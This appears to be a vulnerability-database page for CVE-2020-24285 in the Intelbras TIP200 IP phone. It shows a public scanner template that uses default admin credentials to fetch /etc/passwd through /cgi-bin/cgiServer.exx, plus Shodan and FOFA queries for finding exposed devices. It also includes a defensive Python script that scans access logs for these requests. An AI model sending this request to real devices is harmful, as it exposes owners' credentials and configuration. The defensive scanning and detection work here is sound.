INTELBRAS TELEFONE IP TIP200 version 60.61.75.22 is vulnerable to information disclosure, allowing unauthenticated attackers to access sensitive device information and configuration data via a direct request to the /cgi-bin/export_settings.sh endpoint.
PoC code [public]
id: CVE-2020-24285

info:
  name: INTELBRAS TELEFONE IP TIP200 60.61.75.22 - Local File Inclusion
  author: ritikchaddha
  severity: high
  description: |
    INTELBRAS TELEFONE IP TIP200 version 60.61.75.22 is vulnerable to information disclosure, allowing unauthenticated attackers to access sensitive device information and configuration data via a direct request to the /cgi-bin/export_settings.sh endpoint.
  remediation: |
    Update the device firmware to the latest version provided by INTELBRAS.
  reference:
    - https://github.com/SecLoop/CVE/blob/main/telefone_ip_tip200.md
    - https://nvd.nist.gov/vuln/detail/CVE-2020-24285
  classification:
    cve-id: CVE-2020-24285
    cwe-id: CWE-200
    epss-score: 0.10266
    epss-percentile: 0.92885
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
  metadata:
    vendor: intelbras
    product: tip200
    max-request: 1
    verified: true
    shodan-query: html:"/cgi-bin/cgiServer.exx"
    fofa-query: body="/cgi-bin/cgiServer.exx"
  tags: cve,cve2020,intelbras,telefone,tip200,exposure,lfi

variables:
  username: "admin"
  password: "admin"

http:
  - raw:
      - |
        GET /cgi-bin/cgiServer.exx?download=/etc/passwd HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic {{base64('{{username}}:' + '{{password}}')}}

    skip-variables-check: true
    matchers:
      - type: dsl
        dsl:
          - "contains_all(tolower(header), 'application/octet-stream', 'filename=')"
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
        condition: and
# digest: 4a0a00473045022100bb730cbeb644fae313e65b222f5eb2180917342b2a013a8291294dbe746fe44c02205b914eae9e20412d1062868f58ab4a7326e3002e6411dedad3ad77771e54979a:922c64590222798bb761d5b6d8e72950
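
For defenders, the following added example (not part of the template or the vendor's code) flags requests to the two endpoints named on this page in web access logs. It assumes Combined Log Format logs from a proxy or sensor in front of the phone; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Endpoints named on this page for CVE-2020-24285.
EXPORT_PATH = "/cgi-bin/export_settings.sh"
CGI_PATH = "/cgi-bin/cgiServer.exx"

# Assumption: Combined Log Format from a proxy or sensor in front of the phone.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def classify(target):
    """Return (reason, file) when the target hits an endpoint from the page."""
    parts = urlsplit(target)
    # Decode %xx and collapse duplicate slashes before comparing paths.
    path = re.sub(r"/{2,}", "/", unquote(parts.path))
    if path == EXPORT_PATH:
        return ("settings export", None)
    if path == CGI_PATH:
        # parse_qs percent-decodes values; any download= request is reviewed.
        files = parse_qs(parts.query).get("download")
        if files:
            return ("file download", files[0])
    return None

def scan(lines):
    """Return one finding per matching log line."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        hit = classify(m["target"]) if m else None
        if hit:
            findings.append({"ip": m["ip"], "user": m["user"], "reason": hit[0],
                             "file": hit[1], "served": m["status"] == "200"})
    return findings

# Constructed sample log lines (documentation address ranges).
SAMPLE = [
    '198.51.100.7 - admin [12/Mar/2024:10:01:02 +0000] "GET /cgi-bin/cgiServer.exx?download=%2Fetc%2Fpasswd HTTP/1.1" 200 812',
    '198.51.100.7 - - [12/Mar/2024:10:01:05 +0000] "GET /cgi-bin/export_settings.sh HTTP/1.1" 200 20480',
    '192.0.2.10 - - [12/Mar/2024:10:02:00 +0000] "GET / HTTP/1.1" 200 5120',
    '192.0.2.44 - - [12/Mar/2024:10:03:00 +0000] "GET /cgi-bin//cgiServer.exx?download=/etc/passwd HTTP/1.1" 401 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A finding with `served` set to true means the device answered 200, so the exported configuration or file should be treated as disclosed and its credentials rotated.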